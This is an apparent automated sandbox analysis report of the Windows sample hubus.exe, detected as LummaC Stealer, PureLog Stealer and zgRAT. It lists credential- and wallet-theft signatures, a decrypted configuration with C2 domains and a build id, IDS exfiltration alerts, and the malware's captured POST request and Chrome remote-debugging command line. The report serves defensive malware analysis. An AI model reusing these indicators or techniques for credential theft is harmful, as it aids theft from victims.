Windows Analysis Report
hubus.exe

Overview

General Information

Sample name: hubus.exe
(renamed file extension from dll to exe)
Original sample name: hubus.dll
Analysis ID: 1578636
MD5: 43f8e85b16887df9aee3d896bd1fd7e3
SHA1: f09fae91694982e2d5dafad61b1addf0aef0abd2
SHA256: 8b1984efe2ed414eef8b8c8de34f03e3fdbccf0e4782dd8d1d958a7dbdef6e7d

Detection

LummaC, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • hubus.exe (PID: 428 cmdline: "C:\Users\user\Desktop\hubus.exe" MD5: 43F8E85B16887DF9AEE3D896BD1FD7E3)
    • hubus.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\hubus.exe" MD5: 43F8E85B16887DF9AEE3D896BD1FD7E3)
      • chrome.exe (PID: 7388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

{"C2 url": ["crosshuaht.lat", "testyhurriedo.click", "energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "jMw1IE--SHELLS"}

Source | Rule | Description | Author
hubus.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
hubus.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: hubus.exe PID: 428 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.hubus.exe.5c90000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.0.hubus.exe.a70000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.hubus.exe.a70000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\hubus.exe", ParentImage: C:\Users\user\Desktop\hubus.exe, ParentProcessId: 4780, ParentProcessName: hubus.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7388, ProcessName: chrome.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T00:58:24.104291+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.047908+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:34.058030+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49760 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:35.185431+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49761 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:36.342508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49762 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:37.318729+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49763 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:38.278410+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49764 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:39.539585+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49765 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:42.379010+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49766 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:24.759785+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.772976+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:42.933024+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49766 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:24.759785+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.772976+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:38.815041+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49764 | 104.21.112.1 | 443 | TCP

AV Detection

Source: hubus.exe, Avira: detected
Source: 1.2.hubus.exe.400000.0.raw.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "testyhurriedo.click", "energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "jMw1IE--SHELLS"}
Source: hubus.exe, ReversingLabs: Detection: 36%
Source: hubus.exe, Joe Sandbox ML: detected
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: rapeflowwj.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: crosshuaht.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: sustainskelet.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: aspecteirs.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: energyaffai.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: necklacebudi.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: discokeyus.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: grannyejh.lat
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: testyhurriedo.click
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: lid=%s&j=%s&ver=4.0
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: TeslaBrowser/5.5
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: - Screen Resoluton:
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: - Physical Installed Memory:
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: Workgroup: -
Source: 1.2.hubus.exe.400000.0.raw.unpack, String decryptor: jMw1IE--SHELLS
Source: C:\Users\user\Desktop\hubus.exe, Code function: 1_2_00419F2F CryptUnprotectData
Source: hubus.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49744 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49762 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49763 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49766 version: TLS 1.2
Source: hubus.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
Source: chrome.exe, Memory has grown: Private usage: 0MB later: 36MB

Networking

Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49744 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49745 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49744 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49745 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49764 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49766 -> 104.21.112.1:443
Source: Joe Sandbox View, IP Address: 104.21.112.1
Source: Joe Sandbox View, IP Address: 239.255.255.250
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49744 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49745 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49765 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49760 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49764 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49762 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49763 -> 104.21.112.1:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49766 -> 104.21.112.1:443
Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown, TCP traffic detected without corresponding DNS query: 23.39.228.7
Source: unknown, TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown, TCP traffic detected without corresponding DNS query: 173.194.219.94
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: C:\Users\user\Desktop\hubus.exe, Code function: 1_2_00420180 recv
                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000003.12119374185.00002D2402418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119276808.00002D24036CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return 
instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                          Source: chrome.exe, 00000002.00000003.12119374185.00002D2402418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119276808.00002D24036CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return 
instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
                          Source: chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                          Source: global traffic. DNS traffic detected: DNS query: testyhurriedo.click
                          Source: global traffic. DNS traffic detected: DNS query: www.google.com
                          Source: global traffic. DNS traffic detected: DNS query: klipcatepiu0.shop
                          Source: unknown. HTTP traffic detected:
                              POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: testyhurriedo.click
                          Source: global traffic. TCP traffic: 192.168.11.20:55773 -> 239.255.255.250:1900
                          Source: chrome.exe, 00000002.00000002.12193384962.00002D2402CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                          Source: chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                          Source: chrome.exe, 00000002.00000002.12194130563.00002D2402E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12199983480.00002D2403994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: chrome.exe, 00000002.00000003.12121690986.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12122364326.00002D2402C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
